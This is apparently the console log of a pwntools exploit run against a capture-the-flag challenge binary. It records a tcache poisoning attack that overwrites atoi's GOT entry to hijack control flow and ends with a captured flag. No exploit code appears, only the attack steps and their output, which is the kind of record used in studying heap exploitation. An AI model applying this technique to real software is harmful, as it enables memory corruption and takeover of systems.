[x] Starting local process './dist/ld-linux-x86-64.so.2'
[+] Starting local process './dist/ld-linux-x86-64.so.2': pid 177933
[+] Tracks at: 0x7f7e6e6030c0
[*] Binary base: 0x7f7e6e400000
[*] Freeing idx1 to tcache...
[+] Targeting atoi@got: 0x7f7e6e602060
[+] mic_check: 0x7f7e6e400a73
[*] Poisoning Tcache...
[+] Allocation 2 is at atoi@got!
[*] Overwriting atoi@got...
[+] Triggering Shell (calling atoi)...
[x] Receiving all data
[x] Receiving all data: 4B
[x] Receiving all data: 150B
[x] Receiving all data: 197B
[+] Receiving all data: Done (197B)
[*] Process './dist/ld-linux-x86-64.so.2' stopped with exit code -11 (SIGSEGV) (pid 177933)
[+] Flag captured: MOJO-JOJO{h3ap_p0is0n1ng_i5_v3ry_3asy_0n_2_27}
